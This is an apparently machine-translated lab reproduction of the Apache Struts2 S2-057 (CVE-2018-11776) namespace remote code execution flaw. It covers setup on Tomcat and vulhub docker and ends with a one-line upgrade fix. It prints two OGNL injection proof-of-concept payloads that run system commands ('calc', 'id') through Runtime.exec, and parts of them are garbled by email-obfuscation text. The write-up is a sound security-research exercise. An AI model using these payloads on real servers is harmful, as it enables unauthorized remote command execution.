Apache struts2 namespace remote command execution _CVE-2018-11776 (S2-057) vulnerability reproducibility
First, Vulnerability Description
S2-057 vulnerability arising website xml configuration when there is a namespace value, which value does not result in a detailed security filters can be written to the xml, especially the url tag value did not do wildcard filtering, the ability to execute remote codes, and commands to the system to the server system.
Second, the flaw affects versions
Apache struts 2.3-Apache struts 2.3.34
Apache struts 2.5-Apache struts 2.5.16
Third, the vulnerability environment to build and reproducibility
Win7+tomcat7.0+struts-2.5.16
1. Download the struts 2.5.16 Official showcase examples
2, to download the struts2-showcase into the webapps directory of tomcat
3. Modify struts-actionchaining.xml, found two need to be modified
4. Modify struts-actionchaining.xml, will remove namespace, will result type to redirectAction
Amended as follows:
<struts> <package name="actionchaining" extends="struts-default"> <action name="actionChain1" class="org.apache.struts2.showcase.actionchaining.ActionChain1"> <result type="redirectAction"> <param name = "actionName">register2</param> </result> </action> </package> </struts>
5, restart tomcat
6, browser access http://192.168.10.230:8080/struts2-showcase/, vulnerability successfully built environment
7, this exploit is very simple, just an expression in the url structure ognl, plus the value of the name attribute in the configuration file action tab, and ending with .action
Browser access http://192.168.10.230:8080/struts2-showcase/${100*100}/actionChain1.action, will perform Ognl expressions $ 100 * {100}
8, we jump to the path in the configuration file path of action, this, S2-057 vulnerability has been successfully utilized
9, playing a calculator, but not in the target pop-up calculator
Poc as follows:
${(#_memberAccess["allowStaticMethodAccess"]=true,#[email protected]@getRuntime().exec('calc').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[51020],#c.read(#d),#jas502n= @org.apache.struts2.ServletActionContext@getResponse().getWriter(),#jas502n.println(#d ),#jas502n.close())}
Fourth, the vulnerabilities defense
1, upgrade to the latest version
Use docker build
1, the use of environmental vulnerability docker build vulhub
docker-compose up -d
2, after the startup environment, access http://172.17.0.1:8080/struts2-showcase/
3, burp capture, modify package as described loopholes
4, authentication using poc
POC as follows:
${ (#dm[email protected]@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#[email protected]@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
5、把poc替换相应的位置,验证说明存在漏洞 #poc需要url编码
-----------------------------------------------------------------------------------------------------------
参考:https://github.com/vulhub/vulhub/tree/master/struts2/s2-057